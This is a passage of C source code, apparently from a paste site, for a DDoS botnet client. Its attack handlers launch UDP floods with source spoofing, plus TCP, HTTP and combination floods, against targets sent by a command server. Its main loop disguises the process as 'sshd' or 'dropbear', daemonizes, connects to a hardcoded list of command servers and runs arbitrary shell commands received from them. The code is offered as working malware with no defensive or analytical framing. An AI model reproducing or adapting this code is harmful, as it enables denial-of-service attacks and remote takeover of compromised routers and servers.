  2474. int pollinterval = (argc == 7 ? atoi(argv[6]) : 10);
  2475. if(strstr(ip, ",") != NULL)
  2476. {
  2477. unsigned char *hi = strtok(ip, ",");
  2478. while(hi != NULL)
  2479. {
  2480. if(!listFork())
  2481. {
  2482. sendUDP(hi, port, time, spoofed, packetsize, pollinterval);
  2483. _exit(0);
  2484. }
  2485. hi = strtok(NULL, ",");
  2486. }
  2487. } else {
  2488. if (listFork()) { return; }
  2489. sendUDP(ip, port, time, spoofed, packetsize, pollinterval);
  2490. _exit(0);
  2491. }
  2492. }
  2493. if (!strcmp((const char *)argv[0], "HTTP")) {
  2494. if (argc < 6)
  2495. {
  2496. return;
  2497. }
  2498. if (strstr((const char *)argv[1], ",") != NULL) {
  2499. unsigned char *hi = (unsigned char *)strtok((char *)argv[1], ",");
  2500. while (hi != NULL) {
  2501. if (!listFork()) {
  2502. sendHTTP((char*)argv[1], (char*)argv[2], atoi((char*)argv[3]), (char*)argv[4], atoi((char*)argv[5]), atoi((char*)argv[6]));
  2503. _exit(0);
  2504. }
  2505. hi = (unsigned char *)strtok(NULL, ",");
  2506. }
  2507. } else {
  2508. if (listFork()) {
  2509. return;
  2510. }
  2511. sendHTTP((char*)argv[1], (char*)argv[2], atoi((char*)argv[3]), (char*)argv[4], atoi((char*)argv[5]), atoi((char*)argv[6]));
  2512. _exit(0);
  2513. }
  2514. }
  2515. if(!strcmp(argv[0], "CNC"))
  2516. {
  2517. if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
  2518. {
  2519. return;
  2520. }
  2521. unsigned char *ip = argv[1];
  2522. int port = atoi(argv[2]);
  2523. int time = atoi(argv[3]);
  2524. if(strstr(ip, ",") != NULL)
  2525. {
  2526. unsigned char *hi = strtok(ip, ",");
  2527. while(hi != NULL)
  2528. {
  2529. if(!listFork())
  2530. {
  2531. sendCNC(hi, port, time);
  2532. close(D1ckSucka);
  2533. _exit(0);
  2534. }
  2535. hi = strtok(NULL, ",");
  2536. }
  2537. } else {
  2538. if (listFork()) { return; }
  2539. sendCNC(ip, port, time);
  2540. _exit(0);
  2541. }
  2542. }
  2543. if(!strcmp(argv[0], "COMBO"))
  2544. {
  2545. if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
  2546. {
  2547. return;
  2548. }
  2549. unsigned char *ip = argv[1];
  2550. int port = atoi(argv[2]);
  2551. int time = atoi(argv[3]);
  2552. if(strstr(ip, ",") != NULL)
  2553. {
  2554. unsigned char *hi = strtok(ip, ",");
  2555. while(hi != NULL)
  2556. {
  2557. if(!listFork())
  2558. {
  2559. sendJUNK(hi, port, time);
  2560. sendSTD(hi, port, time);
  2561. sendHOLD(hi, port, time);
  2562. close(D1ckSucka);
  2563. _exit(0);
  2564. }
  2565. hi = strtok(NULL, ",");
  2566. }
  2567. } else {
  2568. if (listFork()) { return; }
  2569. sendJUNK(ip, port, time);
  2570. sendSTD(ip, port, time);
  2571. sendHOLD(ip, port, time);
  2572. _exit(0);
  2573. }
  2574. }
  2575. if(!strcmp(argv[0], "STD"))
  2576. {
  2577. if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
  2578. {
  2579. return;
  2580. }
  2581. unsigned char *ip = argv[1];
  2582. int port = atoi(argv[2]);
  2583. int time = atoi(argv[3]);
  2584. if(strstr(ip, ",") != NULL)
  2585. {
  2586. unsigned char *hi = strtok(ip, ",");
  2587. while(hi != NULL)
  2588. {
  2589. if(!listFork())
  2590. {
  2591. sendSTD(hi, port, time);
  2592. _exit(0);
  2593. }
  2594. hi = strtok(NULL, ",");
  2595. }
  2596. } else {
  2597. if (listFork()) { return; }
  2598. sendSTD(ip, port, time);
  2599. _exit(0);
  2600. }
  2601. }
  2602. if(!strcmp(argv[0], "TCP"))
  2603. {
  2604. if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[4]) > 32 || (argc > 6 && atoi(argv[6]) < 0) || (argc == 8 && atoi(argv[7]) < 1))
  2605. {
  2606. return;
  2607. }
  2608. unsigned char *ip = argv[1];
  2609. int port = atoi(argv[2]);
  2610. int time = atoi(argv[3]);
  2611. int spoofed = atoi(argv[4]);
  2612. unsigned char *flags = argv[5];
  2613. int pollinterval = argc == 8 ? atoi(argv[7]) : 10;
  2614. int psize = argc > 6 ? atoi(argv[6]) : 0;
  2615. if(strstr(ip, ",") != NULL)
  2616. {
  2617. unsigned char *hi = strtok(ip, ",");
  2618. while(hi != NULL)
  2619. {
  2620. if(!listFork())
  2621. {
  2622. sendTCP(hi, port, time, spoofed, flags, psize, pollinterval);
  2623. _exit(0);
  2624. }
  2625. hi = strtok(NULL, ",");
  2626. }
  2627. } else {
  2628. if (listFork()) { return; }
  2629. sendTCP(ip, port, time, spoofed, flags, psize, pollinterval);
  2630. _exit(0);
  2631. }
  2632. }
  2633. if(!strcmp(argv[0], "STOP"))
  2634. {
  2635. int killed = 0;
  2636. unsigned long i;
  2637. for (i = 0; i < numpids; i++) {
  2638. if (pids[i] != 0 && pids[i] != getpid()) {
  2639. kill(pids[i], 9);
  2640. killed++;
  2641. }
  2642. }
  2643. }
  2644. if(!strcmp(argv[0], "HOODASSSHIT"))
  2645. {
  2646. exit(0);
  2647. }
  2648. }
  2649. int initConnection()
  2650. {
  2651. unsigned char server[4096];
  2652. memset(server, 0, 4096);
  2653. if(D1ckSucka) { close(D1ckSucka); D1ckSucka = 0; }
  2654. if(D1ckSuckaz + 1 == SERVER_LIST_SIZE) D1ckSuckaz = 0;
  2655. else D1ckSuckaz++;
  2656. strcpy(server, hekkertelnet[D1ckSuckaz]);
  2657. int port = Server_Botport;
  2658. if(strchr(server, ':') != NULL)
  2659. {
  2660. port = atoi(strchr(server, ':') + 1);
  2661. *((unsigned char *)(strchr(server, ':'))) = 0x0;
  2662. }
  2663. D1ckSucka = socket(AF_INET, SOCK_STREAM, 0);
  2664. if(!connectTimeout(D1ckSucka, server, port, 30)) return 1;
  2665. return 0;
  2666. }
  2667. int getOurIP()
  2668. {
  2669. int sock = socket(AF_INET, SOCK_DGRAM, 0);
  2670. if(sock == -1) return 0;
  2671. struct sockaddr_in serv;
  2672. memset(&serv, 0, sizeof(serv));
  2673. serv.sin_family = AF_INET;
  2674. serv.sin_addr.s_addr = inet_addr("8.8.8.8");
  2675. serv.sin_port = htons(53);
  2676. int err = connect(sock, (const struct sockaddr*) &serv, sizeof(serv));
  2677. if(err == -1) return 0;
  2678. struct sockaddr_in name;
  2679. socklen_t namelen = sizeof(name);
  2680. err = getsockname(sock, (struct sockaddr*) &name, &namelen);
  2681. if(err == -1) return 0;
  2682. ourIP.s_addr = name.sin_addr.s_addr;
  2683. int cmdline = open("/proc/net/route", O_RDONLY);
  2684. char linebuf[4096];
  2685. while(fdgets(linebuf, 4096, cmdline) != NULL)
  2686. {
  2687. if(strstr(linebuf, "\t00000000\t") != NULL)
  2688. {
  2689. unsigned char *pos = linebuf;
  2690. while(*pos != '\t') pos++;
  2691. *pos = 0;
  2692. break;
  2693. }
  2694. memset(linebuf, 0, 4096);
  2695. }
  2696. close(cmdline);
  2697. if(*linebuf)
  2698. {
  2699. int i;
  2700. struct ifreq ifr;
  2701. strcpy(ifr.ifr_name, linebuf);
  2702. ioctl(sock, SIOCGIFHWADDR, &ifr);
  2703. for (i=0; i<6; i++) macAddress[i] = ((unsigned char*)ifr.ifr_hwaddr.sa_data)[i];
  2704. }
  2705. close(sock);
  2706. }
  2707. char *getBuild()
  2708. {
  2709. if(access("/usr/bin/python", F_OK) != -1){
  2710. return "SERVER";
  2711. } else {
  2712. return "ROUTER";
  2713. }
  2714. }
  2715. int main(int argc, unsigned char *argv[])
  2716. {
  2717. char *mynameis = "";
  2718. if(access("/usr/bin/python", F_OK) != -1){
  2719. mynameis = "sshd";
  2720. } else {
  2721. mynameis = "/usr/sbin/dropbear";
  2722. }
  2723. if(geteuid() == 0){
  2724. userID = 0;
  2725. }
  2726. char *Buildz = getBuild();
  2727. if(Buildz == "SERVER")
  2728. {
  2729. //If python is installed
  2730. } else {
  2731. //If python is not installed
  2732. }
  2733. if(SERVER_LIST_SIZE <= 0) return 0;
  2734. printf("BUILD %s:%s\n", getBuild(), inet_ntoa(ourIP));
  2735. strncpy(argv[0],"",strlen(argv[0]));
  2736. sprintf(argv[0], mynameis);
  2737. prctl(PR_SET_NAME, (unsigned long) mynameis, 0, 0, 0);
  2738. srand(time(NULL) ^ getpid());
  2739. init_rand(time(NULL) ^ getpid());
  2740. pid_t pid1;
  2741. pid_t pid2;
  2742. int status;
  2743. getOurIP();
  2744. if (pid1 = fork()) {
  2745. waitpid(pid1, &status, 0);
  2746. exit(0);
  2747. } else if (!pid1) {
  2748. if (pid2 = fork()) {
  2749. exit(0);
  2750. } else if (!pid2) {
  2751. } else {
  2752. //N
  2753. }
  2754. } else {
  2755. //N
  2756. }
  2757. setsid();
  2758. chdir("/");
  2759. signal(SIGPIPE, SIG_IGN);
  2760. while(1)
  2761. {
  2762. if(initConnection()) { sleep(5); continue; }
  2763. HackerPrint(D1ckSucka, "\x1b[1;36m Daddy Bot Connected \x1b[1;31m| \x1b[1;37mIP: \x1b[1;35m%s \x1b[1;31m| \x1b[1;37mType: \x1b[1;35m%s \x1b[1;31m| \x1b[1;37mVersion: \x1b[1;35m%s", inet_ntoa(ourIP), getBuild(), VERSION);
  2764. char commBuf[4096];
  2765. int got = 0;
  2766. int i = 0;
  2767. while((got = recvLine(D1ckSucka, commBuf, 4096)) != -1)
  2768. {
  2769. for (i = 0; i < numpids; i++) if (waitpid(pids[i], NULL, WNOHANG) > 0) {
  2770. unsigned int *newpids, on;
  2771. for (on = i + 1; on < numpids; on++) pids[on-1] = pids[on];
  2772. pids[on - 1] = 0;
  2773. numpids--;
  2774. newpids = (unsigned int*)malloc((numpids + 1) * sizeof(unsigned int));
  2775. for (on = 0; on < numpids; on++) newpids[on] = pids[on];
  2776. free(pids);
  2777. pids = newpids;
  2778. }
  2779. commBuf[got] = 0x00;
  2780. trim(commBuf);
  2781. if(strstr(commBuf, "PING") == commBuf)
  2782. {
  2783. HackerPrint(D1ckSucka, "PONG");
  2784. continue;
  2785. }
  2786. if(strstr(commBuf, "DUP") == commBuf) exit(0);
  2787. unsigned char *message = commBuf;
  2788. if(*message == '!')
  2789. {
  2790. unsigned char *nickMask = message + 1;
  2791. while(*nickMask != ' ' && *nickMask != 0x00) nickMask++;
  2792. if(*nickMask == 0x00) continue;
  2793. *(nickMask) = 0x00;
  2794. nickMask = message + 1;
  2795. message = message + strlen(nickMask) + 2;
  2796. while(message[strlen(message) - 1] == '\n' || message[strlen(message) - 1] == '\r') message[strlen(message) - 1] = 0x00;
  2797. unsigned char *command = message;
  2798. while(*message != ' ' && *message != 0x00) message++;
  2799. *message = 0x00;
  2800. message++;
  2801. unsigned char *tmpcommand = command;
  2802. while(*tmpcommand) { *tmpcommand = toupper(*tmpcommand); tmpcommand++; }
  2803. if(strcmp(command, "") == 0)
  2804. {
  2805. unsigned char buf[1024];
  2806. int command;
  2807. if (listFork()) continue;
  2808. memset(buf, 0, 1024);
  2809. szprintf(buf, "%s 2>&1", message);
  2810. command = fdpopen(buf, "r");
  2811. while(fdgets(buf, 1024, command) != NULL)
  2812. {
  2813. trim(buf);
  2814. memset(buf, 0, 1024);
  2815. sleep(1);
  2816. }
  2817. fdpclose(command);
  2818. exit(0);
  2819. }
  2820. unsigned char *params[10];
  2821. int paramsCount = 1;
  2822. unsigned char *pch = strtok(message, " ");
  2823. params[0] = command;
  2824. while(pch)
  2825. {
  2826. if(*pch != '\n')
  2827. {
  2828. params[paramsCount] = (unsigned char *)malloc(strlen(pch) + 1);
  2829. memset(params[paramsCount], 0, strlen(pch) + 1);
  2830. strcpy(params[paramsCount], pch);
  2831. paramsCount++;
  2832. }
  2833. pch = strtok(NULL, " ");
  2834. }
  2835. processCmd(paramsCount, params);
  2836. if(paramsCount > 1)
  2837. {
  2838. int q = 1;
  2839. for(q = 1; q < paramsCount; q++)
  2840. {
  2841. free(params[q]);
  2842. }
  2843. }
  2844. }
  2845. }
  2846. }
  2847. return 0;
  2848. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement